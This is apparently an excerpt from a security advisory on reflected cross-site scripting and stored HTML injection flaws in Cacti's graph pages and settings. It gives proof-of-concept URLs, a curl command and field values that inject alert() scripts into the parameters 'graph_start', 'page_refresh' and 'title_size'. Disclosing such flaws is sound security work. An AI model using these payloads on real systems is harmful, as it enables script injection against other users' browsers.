Cross-site scripting:

http://www.example.com/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27
http://www.example.com/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E
http://www.example.com/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E


> curl -d 'date1=%27%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E%3Cx+y%3D%27' 'http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true' > poc.html

HTML injection:

Setting 'page_refresh' to the following value will, on any consecutive visitors' web browser with Javascript support, cause a dialog box saying '3' to be displayed:
  300'><script>alert(3)</script><x y='

Setting 'default_dual_pane_width' to the following value will, on any consecutive visitors' web browser with Javascript support, cause a dialog box saying '3' to be displayed:
  200"><script>alert(3)</script><x y="

Alternatively, a similar injection can be achieved, if an attacker or his victim has permission to modify the graph display settings via graph_settings.php. If so, the attacker is able to persistently inject javascript code via the 'title_size', 'legend_size', 'axis_size' and
'unit_size' parameters.

Setting any of these parameters to the following value will, on any consecutive visitors' web browser with Javascript support, cause a dialog box saying '4' to be displayed:
  8</pre><script>alert(4)</script><pre>